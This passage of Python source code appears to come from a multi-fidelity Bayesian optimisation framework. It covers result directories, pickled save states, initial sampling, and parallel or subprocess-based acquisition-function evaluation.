Using default (KG).\")\n self.__create_dir_and_files()\n self.__create_output_dataframes()\n self.__get_initial_data__()\n self.logger.info(\"Initialization Completed\") \n \n \n def __create_dir_and_files(self):\n # Create the required directories for saving the results and the subprocess\n # information if applicable\n try:\n os.mkdir('{}/results'.format(self.workingDir))\n self.logger.debug(\"Results Directory Created Successfully\")\n except FileExistsError:\n self.logger.debug(\"Results Directory Already Exists\")\n try:\n os.mkdir('{}/data'.format(self.workingDir))\n self.logger.debug(\"Data Directory Created Successfully\")\n except FileExistsError:\n self.logger.debug(\"Data Directory Already Exists\")\n try:\n os.mkdir('{}/data/parameterSets'.format(self.workingDir))\n self.logger.debug(\"Parameter Set Directory Created Successfully\")\n except FileExistsError:\n self.logger.debug(\"Parameter Set Directory Already Exists\")\n try:\n os.mkdir('{}/results/{}'.format(self.workingDir, \n self.calculationName))\n self.logger.debug(\"Calculation Results Directory [{}] Created Successfully\".format(self.calculationName))\n except FileExistsError:\n self.logger.debug(\"Calculation Results Directory [{}] Already Exists\".format(self.calculationName))\n # If using subprocesses, create the folder structure needed\n if self.multinode != 0:\n if os.path.exists('{}/subprocess'.format(self.workingDir)):\n rmtree('{}/subprocess'.format(self.workingDir))\n self.logger.debug(\"Existing Subprocess Directory Removed\")\n os.mkdir('{}/subprocess'.format(self.workingDir))\n os.mkdir('{}/subprocess/LSFOut'.format(self.workingDir))\n self.logger.debug(\"Subprocess Directory Created\")\n \n def __create_output_dataframes(self):\n # The output of the framework is contained in two pandas dataframes\n # the evaluatedPoints df contains all the points that have been \n # evaluated from all models\n labels1 = [\"Model Index\", \"Iteration\", \"y\"]\n for ii in range(self.nDim):\n labels1.append(\"x{}\".format(ii))\n self.inputLabels.append(\"x{}\".format(ii))\n self.evaluatedPoints = pd.DataFrame(columns=labels1)\n # the iterationData df shows the iterations, model calls and maximum \n # value found\n labels2 = [\"Iteration\", \"Max Found\", \"Calculation Time\", \"Truth Model\"]\n for ii in range(len(self.ROM)):\n labels2.append(\"ROM {}\".format(ii))\n self.iterationData = pd.DataFrame(columns=labels2)\n self.logger.debug(\"Output Dataframes Created\")\n \n def __save_output_dataframes(self):\n # The dataframes are saved in two forms, first a pickled version of the\n # dataframe, and also a csv version for readability\n with open('{}/results/{}/evaluatedPoints'.format(self.workingDir, self.calculationName), 'wb') as f:\n dump(self.evaluatedPoints, f)\n self.evaluatedPoints.to_csv('{}/results/{}/evaluatedPoints.csv'.format(self.workingDir, self.calculationName))\n with open('{}/results/{}/iterationData'.format(self.workingDir, self.calculationName), 'wb') as f:\n dump(self.iterationData, f)\n self.iterationData.to_csv('{}/results/{}/iterationData.csv'.format(self.workingDir, self.calculationName))\n # for the GP Hedge approach, the choice of model for each iteration is\n # also saved to a separate file\n hedge_out = {\"ROM\":[], \"TM\":[]}\n if self.acquisitionFunc == \"Hedge\":\n hedge_out[\"ROM\"] = self.gpHedgeTrack\n if self.tmSampleOpt == \"Hedge\":\n hedge_out[\"TM\"] = self.gpHedgeTrackTM\n if self.acquisitionFunc == \"Hedge\" or self.tmSampleOpt == \"Hedge\":\n with 
open('{}/results/{}/hedgeRecord'.format(self.workingDir, self.calculationName), 'wb') as f:\n dump(hedge_out, f)\n self.logger.info(\"Dataframes Pickled and Dumped to Results Directory\")\n \n def __save_calculation_state(self):\n # This function saves the entire barefoot object into a pickle file\n with open('{}/data/{}_save_state'.format(self.workingDir, self.calculationName), 'wb') as f:\n dump(self, f)\n self.logger.info(\"Calculation State Saved\")\n \n def __load_from_save(self, workingDir, calculationName):\n # This function restores the barefoot object parameters from a saved\n # pickle file. In order for this to work, each variable of the object\n # is restored separately.\n try:\n with open('{}/data/{}_save_state'.format(workingDir, calculationName), 'rb') as f:\n saveState = load(f)\n self.logger.debug(\"Save State File Found\")\n for item in vars(saveState).items():\n setattr(self, item[0], item[1])\n except FileNotFoundError:\n self.loadFailed = True\n self.logger.warning(\"Could not find Save State File\")\n \n def __add_to_evaluatedPoints(self, modelIndex, eval_x, eval_y):\n # Adds new data points to the evaluated datapoints dataframe\n temp = np.zeros((eval_x.shape[0], self.nDim+3))\n temp[:,0] = modelIndex\n temp[:,1] = self.currentIteration\n temp[:,2] = eval_y\n temp[:,3:] = eval_x\n temp = pd.DataFrame(temp, columns=self.evaluatedPoints.columns)\n self.evaluatedPoints = pd.concat([self.evaluatedPoints,temp])\n self.logger.debug(\"{} New Points Added to Evaluated Points Dataframe\".format(eval_x.shape[0]))\n \n def __add_to_iterationData(self, calcTime, iterData):\n # Adds new data points to the Iteration Data Dataframe\n temp = np.zeros((1,4+len(self.ROM)))\n temp[0,0] = self.currentIteration\n temp[0,1] = self.maxTM\n temp[0,2] = calcTime\n temp[0,3] = iterData[-1]\n temp[0,4:] = iterData[0:len(self.ROM)]\n temp = pd.DataFrame(temp, columns=self.iterationData.columns)\n self.iterationData = pd.concat([self.iterationData,temp])\n self.logger.debug(\"Iteration {} Data saved to Dataframe\".format(self.currentIteration))\n \n def __get_initial_data__(self):\n # Function for obtaining the initial data either by calculation or by \n # extracting the data from a file.\n params = []\n count = []\n param_index = 0\n self.maxTM = -np.inf\n if self.acquisitionFunc == \"Hedge\":\n self.gpHedgeHist = [[np.random.random()],[np.random.random()],\n [np.random.random()],[np.random.random()]]\n self.gpHedgeProb = np.sum(self.gpHedgeHist, axis=1)\n self.gpHedgeTrack = []\n if self.tmSampleOpt == \"Hedge\":\n self.gpHedgeHistTM = [[np.random.random()],[np.random.random()],\n [np.random.random()],[np.random.random()]]\n self.gpHedgeProbTM = np.sum(self.gpHedgeHistTM, axis=1)\n self.gpHedgeTrackTM = []\n # Check if data needs to be calculated or extracted\n if self.calcInitData:\n self.logger.debug(\"Start Calculation of Initial Data\")\n # obtain LHS initial data for each reduced order model\n for ii in range(len(self.ROM)):\n count.append(0) \n initInput, check = apply_constraints(self.initDataPathorNum[ii], \n self.nDim, self.res,\n self.A, self.b, self.Aeq, self.beq, \n self.lb, self.ub, self.constr_func)\n if check:\n self.logger.debug(\"Initial Data - All constraints applied successfully\")\n else:\n self.logger.critical(\"Initial Data - Some or All Constraints Could not Be applied! 
Continuing Without Constraints\")\n \n for jj in range(self.initDataPathorNum[ii]):\n params.append({\"Model Index\":ii,\n \"Model\":self.ROM[ii],\n \"Input Values\":initInput[jj,:],\n \"ParamIndex\":param_index})\n param_index += 1\n self.ROMInitInput.append(np.zeros_like(initInput))\n self.ROMInitOutput.append(np.zeros(self.initDataPathorNum[ii]))\n count.append(0)\n # Obtain LHS initial data for Truth Model\n initInput, check = apply_constraints(self.initDataPathorNum[ii+1], \n self.nDim, self.res,\n self.A, self.b, self.Aeq, self.beq, \n self.lb, self.ub, self.constr_func)\n if check:\n self.logger.debug(\"Initial Data - All constraints applied successfully\")\n else:\n self.logger.critical(\"Initial Data - Some or All Constraints Could not Be applied! Continuing Without Constraints\")\n for jj in range(self.initDataPathorNum[-1]):\n params.append({\"Model Index\":-1,\n \"Model\":self.TM,\n \"Input Values\":initInput[jj,:],\n \"ParamIndex\":param_index})\n param_index += 1\n self.TMInitInput = np.zeros_like(initInput)\n self.TMInitOutput = np.zeros(self.initDataPathorNum[-1])\n \n # Calculate all the initial data in parallel\n temp_x = np.zeros((len(params), self.nDim))\n temp_y = np.zeros(len(params))\n temp_index = np.zeros(len(params))\n self.logger.debug(\"Parameters Defined. Starting Concurrent.Futures Calculation\")\n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(params, executor.map(call_model, params)):\n par, results = result_from_process\n if par[\"Model Index\"] != -1:\n self.ROMInitInput[par[\"Model Index\"]][count[par[\"Model Index\"]],:] = par[\"Input Values\"]\n self.ROMInitOutput[par[\"Model Index\"]][count[par[\"Model Index\"]]] = results\n temp_x[par[\"ParamIndex\"],:] = par[\"Input Values\"]\n temp_y[par[\"ParamIndex\"]] = results\n temp_index[par[\"ParamIndex\"]] = par[\"Model Index\"]\n else:\n self.TMInitInput[count[par[\"Model Index\"]],:] = par[\"Input Values\"]\n self.TMInitOutput[count[par[\"Model Index\"]]] = results\n if np.max(results) > self.maxTM:\n self.maxTM = np.max(results)\n temp_x[par[\"ParamIndex\"],:] = par[\"Input Values\"]\n temp_y[par[\"ParamIndex\"]] = results\n temp_index[par[\"ParamIndex\"]] = par[\"Model Index\"]\n count[par[\"Model Index\"]] += 1\n self.logger.debug(\"Concurrent.Futures Calculation Completed\")\n else:\n # extract the initial data from the file\n self.logger.debug(\"Start Loading Initial Data from Files\")\n with open(self.initDataPathorNum, 'rb') as f:\n data = load(f)\n \n # extract data from dictionary in file and assign to correct variables\n self.TMInitOutput = data[\"TMInitOutput\"]\n self.TMInitInput = data[\"TMInitInput\"]\n self.ROMInitOutput = data[\"ROMInitOutput\"]\n self.ROMInitInput = data[\"ROMInitInput\"]\n \n ROMSize = 0\n for mmm in range(len(self.ROMInitInput)):\n ROMSize += self.ROMInitOutput[mmm].shape[0]\n \n temp_x = np.zeros((self.TMInitOutput.shape[0]+ROMSize, \n self.nDim))\n temp_y = np.zeros(self.TMInitOutput.shape[0]+ROMSize)\n temp_index = np.zeros(self.TMInitOutput.shape[0]+ROMSize)\n \n ind = 0\n \n for ii in range(len(self.ROM)):\n for jj in range(self.ROMInitOutput[ii].shape[0]):\n temp_x[ind,:] = self.ROMInitInput[ii][jj,:]\n temp_y[ind] = self.ROMInitOutput[ii][jj]\n temp_index[ind] = ii\n ind += 1\n count.append(self.ROMInitInput[ii].shape[0])\n for jj in range(self.TMInitOutput.shape[0]):\n temp_x[ind,:] = self.TMInitInput[jj,:]\n temp_y[ind] = self.TMInitOutput[jj]\n if self.TMInitOutput[jj] > self.maxTM:\n self.maxTM = 
self.TMInitOutput[jj]\n temp_index[ind] = -1\n ind += 1\n count.append(self.TMInitInput.shape[0])\n self.logger.debug(\"Loading Data From File Completed\")\n # Add initial data to dataframes\n self.__add_to_evaluatedPoints(temp_index, temp_x, temp_y)\n self.__add_to_iterationData(time()-self.timeCheck, np.array(count))\n self.logger.debug(\"Initial Data Saved to Dataframes\")\n self.timeCheck = time()\n \n def initialize_parameters(self, modelParam, covFunc=\"M32\", iterLimit=100, \n sampleCount=50, hpCount=100, batchSize=5, \n tmIter=1e6, totalBudget=1e16, tmBudget=1e16, \n upperBound=1, lowBound=0.0001, fusedPoints=5):\n \"\"\"\n This function sets the conditions for the barefoot framework calculations.\n All parameters have default values except the model parameters.\n\n Parameters\n ----------\n modelParam : dict\n This must be a dictionary with the hyperparameters for the reduced\n order models as well as the costs for all the models. The specific\n values in the dictionary must be:\n 'model_l': A list with the characteristic length scale for each\n dimension in each reduced order model GP.\n eg 2 reduced order - 3 dimension models\n [[0.1,0.1,0.1],[0.2,0.2,0.2]]\n 'model_sf': A list with the signal variance for each reduced\n order model GP.\n 'model_sn': A list with the noise variance for each reduced\n order model GP.\n 'means': A list of the mean of each model. Set to 0 if the mean\n is not known\n 'std': A list of the standard deviations of each model. Set to 1\n if the standard deviation is not known.\n 'err_l': A list with the characteristic length scale for each\n dimension in each discrepancy GP. Must match dimensions\n of model_l\n 'err_sf': A list with the signal variance for each discrepancy GP.\n 'err_sn': A list with the noise variance for each discrepancy GP.\n 'costs': The model costs, including the Truth Model\n eg. 2 ROM : [model 1 cost, model 2 cost, Truth model cost]\n covFunc : str, optional\n The covariance function to be used for the Gaussian Process models.\n Options are Squared Exponential (\"SE\"), Matern 3/2 (\"M32\") and \n Matern 5/2 (\"M52\"). The default is \"M32\".\n iterLimit : int, optional\n How many iterations to run the framework calculation before\n terminating. The default is 100.\n sampleCount : int, optional\n The number of samples to use for the acquisition function calculations.\n The default is 50.\n hpCount : int, optional\n The number of hyperparameter sets to use. The default is 100.\n batchSize : int, optional\n The batch size for the model evaluations. The default is 5.\n tmIter : int, optional\n The number of iterations to complete before querying the Truth Model. \n The default is 1e6.\n totalBudget : float, optional\n The total time budget to expend before terminating the calculation. \n The default is 1e16.\n tmBudget : float, optional\n The budget to expend before querying the Truth Model. The default \n is 1e16.\n upperBound : float, optional\n The upper bound for the hyperparameters. The default is 1.\n lowBound : float, optional\n The lower bound for the hyperparameters. The default is 0.0001.\n fusedPoints : int, optional\n The number of points per dimension for the linear grid used to \n evaluate the fused mean and variance for building the fused model. 
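For example, with fusedPoints=5 in a 2-dimensional problem, the fused model is evaluated on a 5 x 5 = 25 point grid.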
\n The default is 5.\n\n Returns\n -------\n None.\n\n \"\"\"\n self.logger.debug(\"Start Initializing Reification Object Parameters\")\n self.covFunc = covFunc \n self.iterLimit = iterLimit \n self.sampleCount = sampleCount \n self.hpCount = hpCount \n self.batchSize = batchSize\n self.tmIterLim = tmIter \n self.totalBudget = totalBudget\n self.tmBudget = tmBudget\n self.upperBound = upperBound\n self.lowBound = lowBound\n self.modelParam = modelParam\n self.modelCosts = modelParam[\"costs\"]\n # The numpy linspace module will contract the distance below 1 if there\n # are also values above 1. The approach implemented here avoids that\n # situation\n if self.upperBound > 1:\n midway = (self.hpCount - (self.hpCount % 2))/2\n lower = np.linspace(self.lowBound, 1.0, num=int(midway), endpoint=False)\n upper = np.linspace(1.0, self.upperBound, num=int(midway)+int(self.hpCount % 2), endpoint=True)\n all_HP = np.append(lower, upper)\n else:\n all_HP = np.linspace(self.lowBound, self.upperBound, num=self.hpCount, endpoint=True)\n # randomly combine the options for the hyperparameters into the hyperparameter sets\n self.fusedModelHP = np.zeros((self.hpCount,self.nDim+1))\n for i in range(self.hpCount):\n for j in range(self.nDim+1):\n self.fusedModelHP[i,j] = all_HP[np.random.randint(0,self.hpCount)]\n # create the evaluation points for determining the fused mean and\n # variance\n temp = np.linspace(0,1,num=fusedPoints)\n arr_list = []\n for ii in range(self.nDim):\n arr_list.append(temp)\n self.xFused = cartesian(*arr_list)\n self.logger.debug(\"Create Reification Object\")\n # build the reification object with the combined inputs and initial values\n self.reificationObj = model_reification(self.ROMInitInput, self.ROMInitOutput, \n self.modelParam['model_l'], \n self.modelParam['model_sf'], \n self.modelParam['model_sn'], \n self.modelParam['means'], \n self.modelParam['std'], \n self.modelParam['err_l'], \n self.modelParam['err_sf'], \n self.modelParam['err_sn'], \n self.TMInitInput, self.TMInitOutput, \n len(self.ROM), self.nDim, self.covFunc)\n self.allTMInput = []\n self.allTMOutput = []\n self.tmBudgetLeft = self.tmBudget\n self.totalBudgetLeft = self.totalBudget\n self.currentIteration += 1\n self.tmIterCount = 0\n self.logger.info(\"Reification Object Initialized. 
Ready for Calculations\")\n \n def __restart_subs(self):\n # This function restarts the sub processes if they have been closed\n # while doing the Truth Model evaluations\n for kk in range(self.multinode):\n try:\n os.remove(\"{}/subprocess/close{}\".format(self.workingDir, kk))\n os.remove(\"{}/subprocess/sub{}.control\".format(self.workingDir, kk))\n os.remove(\"{}/subprocess/sub{}.start\".format(self.workingDir, kk))\n self.logger.debug(\"Close File {} removed\".format(kk))\n except FileNotFoundError:\n self.logger.debug(\"Close File {} does not exist\".format(kk))\n \n calcPerProcess, all_started = self.__start_subprocesses__(self.multinode)\n subProcessWait = True\n while subProcessWait:\n if all_started:\n subProcessWait = False\n else:\n total_started = 0\n for fname in range(self.multinode):\n if os.path.exists(\"{}/subprocess/sub{}.start\".format(self.workingDir, fname)):\n total_started += 1\n if total_started == self.multinode:\n all_started = True\n self.logger.info(\"All Subprocess Jobs Started Successfully\")\n \n def __run_multinode_acq_func(self, x_test, new_mean, calcPerProcess):\n # This function controls the parameter setup and transfer for the\n # evaluation of the acquisition functions to determine the next best\n # points for evaluating the Reduced Order Models when using subprocesses\n self.logger.info(\"Set Up Parameters for Acquisition Function Evaluation and submit to Subprocesses\")\n parameters = []\n parameterFileData = []\n sub_fnames = []\n count = 0\n sub_count = 0\n parameterIndex = 0\n parameterFileIndex = 0\n # Pickle the reification object to be loaded by each of the subprocesses\n # this reduces the amount of memory that needs to be transferred\n with open(\"data/reificationObj\", 'wb') as f:\n dump(self.reificationObj, f)\n # set up the parameters to be used in the calculations\n for jj in range(len(self.ROM)):\n for kk in range(self.sampleCount):\n model_temp = [np.expand_dims(x_test[kk], axis=0), \n np.expand_dims(np.array([new_mean[jj][kk]]), axis=0), \n jj]\n\n for mm in range(self.hpCount):\n parameterFileData.append((1, model_temp, self.xFused, self.fusedModelHP[mm,:],\n self.covFunc, x_test, jj, kk, mm, self.sampleCount,\n self.modelParam['costs'], self.maxTM))\n parameters.append([parameterIndex, parameterFileIndex])\n parameterIndex += 1\n \n # store every 1000 set of parameters in a file for use in the\n # subprocesses\n if len(parameterFileData) == 1000:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n parameterFileData = []\n parameterFileIndex += 1\n parameterIndex = 0\n count += 1\n if count == calcPerProcess:\n fname = \"{}\".format(sub_count)\n sub_fnames.append(fname)\n \n # Send the trigger for the subprocess to pick up the data for\n # the calculations\n with open(\"{}/subprocess/sub{}.control\".format(self.workingDir, sub_count), 'wb') as f:\n control_param = [0, \"iteration\", self.acquisitionFunc]\n dump(control_param, f)\n # dump the index for the parameter files for the subprocess\n # to load\n with open(\"{}/subprocess/{}.dump\".format(self.workingDir, fname), 'wb') as f:\n dump(parameters, f)\n \n parameters = []\n count = 0\n sub_count += 1\n \n # dump the last of the parameter datasets\n if len(parameterFileData) != 0:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n # trigger the last subprocess and dump the index parameters\n if parameters != []:\n fname = 
\"{}\".format(sub_count)\n sub_fnames.append(fname)\n \n with open(\"{}/subprocess/sub{}.control\".format(self.workingDir, sub_count), 'wb') as f:\n control_param = [0, \"iteration\", self.acquisitionFunc]\n dump(control_param, f)\n\n with open(\"{}/subprocess/{}.dump\".format(self.workingDir, fname), 'wb') as f:\n dump(parameters, f)\n \n self.logger.info(\"Start Waiting for Results to Complete\")\n # the calculations will take some time, so start a sleep timer to wait\n # for a minute before starting to check for results\n calc_start = time()\n sleep(60)\n \n finished = 0\n \n process_costs = np.zeros((len(sub_fnames)))\n # check for finished subprocess calculations, and only continue once\n # all subprcesses calculations are completed\n while finished < len(sub_fnames):\n finished = 0\n proc_count = 0\n for sub_name in sub_fnames:\n with open(\"{}/subprocess/sub{}.control\".format(self.workingDir, sub_name), 'rb') as f:\n control_param = load(f)\n if control_param[0] == 1:\n finished += 1\n if process_costs[proc_count] == 0:\n # When a subprocess has completed, record how long\n # the subprocess ran for. This is the cost of the \n # subprocess calculation\n process_costs[proc_count] = time()-calc_start\n if finished < len(sub_fnames): \n sleep(60)\n \n self.logger.info(\"Acquisition Function Evaluations Completed\")\n # Calculate the total subprocess cost.\n process_cost = np.sum(process_costs)\n \n # extract all the outputs from the subprocesses and collate them\n # into a single array\n kg_output = []\n for sub_name in sub_fnames:\n cont_loop = True\n load_failed = True\n timer = 0\n while cont_loop:\n try:\n with open(\"{}/subprocess/{}.output\".format(self.workingDir, sub_name), 'rb') as f:\n sub_output = load(f)\n load_failed = False\n cont_loop = False\n except FileNotFoundError:\n sleep(30)\n timer += 30\n if timer > 300:\n cont_loop = False\n \n if not load_failed:\n self.logger.debug(\"sub_output {} found | length: {}\".format(sub_name, len(sub_output)))\n for jj in range(len(sub_output)):\n kg_output.append(sub_output[jj])\n os.remove(\"{}/subprocess/{}.output\".format(self.workingDir, sub_name))\n os.remove(\"{}/subprocess/{}.dump\".format(self.workingDir, sub_name))\n else:\n self.logger.debug(\"sub_output {} NOT found\".format(len(sub_name)))\n self.logger.debug(\"Calculation Results retrieved from Subprocess Jobs\")\n return kg_output, process_cost\n \n def __run_singlenode_acq_func(self, x_test, new_mean): \n # As before, this function calculates the acquisition function values\n # for determining the next best points to be queried from the reduced\n # order models. 
This function runs the concurrent.futures calculations\n # directly.\n parameters = []\n parameterFileData = []\n count = 0\n parameterIndex = 0\n parameterFileIndex = 0\n self.logger.debug(\"Set Up Parameters for Acquisition Function Evaluation\")\n # Save the current reification object to a file for loading\n with open(\"data/reificationObj\", 'wb') as f:\n dump(self.reificationObj, f)\n # Define the parameters for each calculation\n for jj in range(len(self.ROM)):\n for kk in range(self.sampleCount):\n model_temp = [np.expand_dims(x_test[kk], axis=0), \n np.expand_dims(np.array([new_mean[jj][kk]]), axis=0), \n jj]\n\n for mm in range(self.hpCount):\n parameterFileData.append((1, model_temp, self.xFused, self.fusedModelHP[mm,:],\n self.covFunc, x_test, jj, kk, mm, self.sampleCount,\n self.modelParam['costs'], self.maxTM))\n parameters.append([parameterIndex, parameterFileIndex])\n parameterIndex += 1\n # save each 1000 parameter sets to a file to reduce the amount of memory used\n if len(parameterFileData) == 1000:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n parameterFileData = []\n parameterFileIndex += 1\n parameterIndex = 0\n count += 1\n # save the last of the parameter sets\n if len(parameterFileData) != 0:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n # set which acquisition function will be used\n if self.acquisitionFunc == \"EI\":\n acqFunc = calculate_EI\n elif self.acquisitionFunc == \"KG\":\n acqFunc = calculate_KG\n elif self.acquisitionFunc == \"TS\":\n acqFunc = calculate_TS\n elif self.acquisitionFunc == \"Hedge\":\n acqFunc = calculate_GPHedge\n elif self.acquisitionFunc == \"Greedy\":\n acqFunc = calculate_Greedy\n kg_output = []\n # Start the concurrent calculations and return the output array\n self.logger.info(\"Start Acquisition Function Evaluations for {} Parameter Sets\".format(len(parameters)))\n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(parameters, executor.map(acqFunc,parameters)):\n params, results = result_from_process\n kg_output.append(results)\n self.logger.info(\"Acquisition Function Evaluations Completed\")\n return kg_output, 0 \n \n def __run_multinode_fused(self, tm_test):\n # As with the reduced order model calculations, this function evaluates\n # the selected acquisition function to determine the next best points to \n # evaluate from the Truth model\n \n # Since this set of calculations uses only the hyperparameter count,\n # a new calculation is needed to determine how many calculations to\n # do on each subprocess\n calc_limit = (-(-self.hpCount//self.multinode)) \n self.logger.debug(\"Define Parameters for Max Value Evaluations\")\n parameters = []\n parameterFileData = []\n parameterIndex = 0\n parameterFileIndex = 0\n count = 0\n sub_count = 0\n sub_fnames = []\n # Save the reification object to a file\n with open(\"data/reificationObj\", 'wb') as f:\n dump(self.reificationObj, f)\n for mm in range(self.hpCount):\n parameterFileData.append((1, [], self.xFused, self.fusedModelHP[mm,:],\n self.covFunc, tm_test, self.maxTM, 0.01, self.tmSampleOpt))\n parameters.append([parameterIndex, parameterFileIndex])\n parameterIndex += 1\n count += 1\n \n # Save every 500 parameter sets to a separate file to reduce memory\n # usage\n if len(parameterFileData) == 500:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 
'wb') as f:\n dump(parameterFileData, f)\n parameterFileData = []\n parameterFileIndex += 1\n parameterIndex = 0\n \n if count == calc_limit:\n fname = \"{}\".format(sub_count)\n sub_fnames.append(fname)\n # Trigger the subprocesses with a new calculation set\n with open(\"{}/subprocess/sub{}.control\".format(self.workingDir, sub_count), 'wb') as f:\n control_param = [0, \"fused\", self.acquisitionFunc]\n dump(control_param, f)\n # save the parameter indices to a file\n with open(\"{}/subprocess/{}.dump\".format(self.workingDir, fname), 'wb') as f:\n dump(parameters, f)\n \n parameters = []\n count = 0\n sub_count += 1\n # save the last of the parameter sets to a file\n if len(parameterFileData) != 0:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n \n if parameters != []:\n fname = \"{}\".format(sub_count)\n sub_fnames.append(fname)\n # Trigger the final subprocess to start calculations\n with open(\"{}/subprocess/sub{}.control\".format(self.workingDir, sub_count), 'wb') as f:\n control_param = [0, \"fused\", self.acquisitionFunc]\n dump(control_param, f)\n # dump the parameter indices to a file\n with open(\"{}/subprocess/{}.dump\".format(self.workingDir, fname), 'wb') as f:\n dump(parameters, f)\n\n self.logger.info(\"Parameters for Max Value Calculations Sent to Subprocess\")\n # wait for calculations to finish\n sleep(60)\n\n finished = 0\n # check that all calculations have completed before continuing\n while finished < len(sub_fnames):\n finished = 0\n for sub_name in sub_fnames:\n with open(\"{}/subprocess/sub{}.control\".format(self.workingDir, sub_name), 'rb') as f:\n control_param = load(f)\n if control_param[0] == 1:\n finished += 1\n if finished < len(sub_fnames): \n sleep(60) \n \n fused_output = []\n # Extract the outputs from the individual subprocess output files and\n # collate into a single array\n for sub_name in sub_fnames:\n cont_loop = True\n load_failed = True\n timer = 0\n while cont_loop:\n try:\n with open(\"{}/subprocess/{}.output\".format(self.workingDir, sub_name), 'rb') as f:\n sub_output = load(f)\n load_failed = False\n cont_loop = False\n except FileNotFoundError:\n sleep(30)\n timer += 30\n if timer > 300:\n cont_loop = False\n \n if not load_failed:\n self.logger.debug(\"sub_output {} found | length: {}\".format(sub_name, len(sub_output)))\n for jj in range(len(sub_output)):\n fused_output.append(sub_output[jj])\n os.remove(\"{}/subprocess/{}.output\".format(self.workingDir, sub_name))\n os.remove(\"{}/subprocess/{}.dump\".format(self.workingDir, sub_name))\n else:\n self.logger.debug(\"sub_output {} NOT found\".format(len(sub_name)))\n \n # change the format of the output array to be a numpy array\n fused_output = np.array(fused_output, dtype=object)\n if fused_output.shape[0] == 0:\n fused_output = np.array([[0,0]])\n \n self.logger.info(\"Max Value Calculations Completed\")\n return fused_output\n \n def __run_singlenode_fused(self, tm_test):\n # This function achieves the same functionality as the multi-node fused\n # function above, but does it all on the base node, rather than sending the\n # data to subprocesses.\n parameters = []\n parameterFileData = []\n # initialize the parameters for the fused model calculations and\n # start the calculation\n self.logger.debug(\"Define Parameters for Max Value Evaluations\")\n parameterIndex = 0\n parameterFileIndex = 0\n # save the reification object to a separate file\n with open(\"data/reificationObj\", 'wb') as f:\n 
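# The object is pickled once here so that each fused_calculate worker\n # can re-read it from disk; executor.map then only has to pass the\n # small [parameterIndex, parameterFileIndex] index pairs.\n 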
dump(self.reificationObj, f)\n for mm in range(self.hpCount):\n parameterFileData.append((1, [], self.xFused, self.fusedModelHP[mm,:],\n self.covFunc, tm_test, self.maxTM, 0.01, self.tmSampleOpt))\n parameters.append([parameterIndex, parameterFileIndex])\n parameterIndex += 1\n # Save each set of 500 parameters to a separate file\n if len(parameterFileData) == 500:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n parameterFileData = []\n parameterFileIndex += 1\n parameterIndex = 0\n # Save the last of the parameter sets to a file\n if len(parameterFileData) != 0:\n with open(\"data/parameterSets/parameterSet{}\".format(parameterFileIndex), 'wb') as f:\n dump(parameterFileData, f)\n \n # Set up a list of outputs for each of the results from the acquisition\n # functions if using the GP Hedge approach\n if self.tmSampleOpt == \"Hedge\":\n fused_out = [[],[],[],[]]\n else:\n # Create just a single list for when using other Acquisition Functions\n fused_output = []\n self.logger.info(\"Start Max Value Calculations | {} Sets\".format(len(parameters)))\n count = 0\n # Run the concurrent processes and save the outputs\n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(parameters, executor.map(fused_calculate,parameters)):\n params, results = result_from_process\n if self.tmSampleOpt == \"Hedge\":\n fused_out[0].append(results[0][0])\n fused_out[1].append(results[0][1])\n fused_out[2].append(results[0][2])\n fused_out[3].append(results[0][3])\n else:\n fused_output.append(results[0])\n count += 1\n # When using the GP Hedge approach the list of outputs are returned\n # as-is\n if self.tmSampleOpt == \"Hedge\":\n return fused_out\n # when using other acquisition functions process the output to attempt\n # the removal of all duplicates and then return the processed output\n max_values = np.zeros((results[1],2))\n \n for ii in range(len(fused_output)):\n if max_values[fused_output[ii][1],0] != 0:\n if max_values[fused_output[ii][1],0] < fused_output[ii][0]:\n max_values[fused_output[ii][1],0] = fused_output[ii][0]\n max_values[fused_output[ii][1],1] = fused_output[ii][1]\n else:\n max_values[fused_output[ii][1],0] = fused_output[ii][0]\n max_values[fused_output[ii][1],1] = fused_output[ii][1]\n \n fused_output = max_values[np.where(max_values[:,0]!=0)]\n \n if fused_output.shape[0] == 0:\n fused_output = np.array([[0,0]])\n \n self.logger.info(\"Max Value Calculations Completed\")\n return fused_output\n\n def __call_ROM(self, medoid_out):\n # This function serves to evaluate the Reduced Order Models at the \n # determined points. 
This is done in parallel to reduce the time taken\n params = []\n count = np.zeros((len(self.ROM)+1)) \n current = np.array(self.iterationData.iloc[:,3:])[-1,:]\n count[0:len(self.ROM)] = current[1:]\n count[-1] = current[0]\n param_index = 0\n # Define the parameter sets needed for each calculation\n self.logger.debug(\"Define Parameters for ROM Function Evaluations\")\n for iii in range(medoid_out.shape[0]):\n x_index = 6 + self.nDim\n params.append({\"Model Index\":medoid_out[iii,3],\n \"Model\":self.ROM[medoid_out[iii,3]],\n \"Input Values\":np.array(medoid_out[iii,x_index:], dtype=np.float),\n \"ParamIndex\":param_index})\n param_index += 1\n\n temp_x = np.zeros((len(params), self.nDim))\n temp_y = np.zeros(len(params))\n temp_index = np.zeros(len(params)) \n costs = np.zeros(len(params))\n # Run the concurrent calculations and extract the results\n self.logger.info(\"Start ROM Function Evaluations | {} Calculations\".format(len(params)))\n with concurrent.futures.ProcessPoolExecutor(cpu_count()) as executor:\n for result_from_process in zip(params, executor.map(call_model, params)):\n par, results = result_from_process\n temp_x[par[\"ParamIndex\"],:] = par[\"Input Values\"]\n temp_y[par[\"ParamIndex\"]] = results\n temp_index[par[\"ParamIndex\"]] = par[\"Model Index\"]\n if not self.maximize:\n results = (-1)*results\n self.reificationObj.update_GP(par[\"Input Values\"], results, par[\"Model Index\"])\n costs[par[\"ParamIndex\"]] += self.modelCosts[par[\"Model Index\"]]\n count[par[\"Model Index\"]] += 1\n return temp_x, 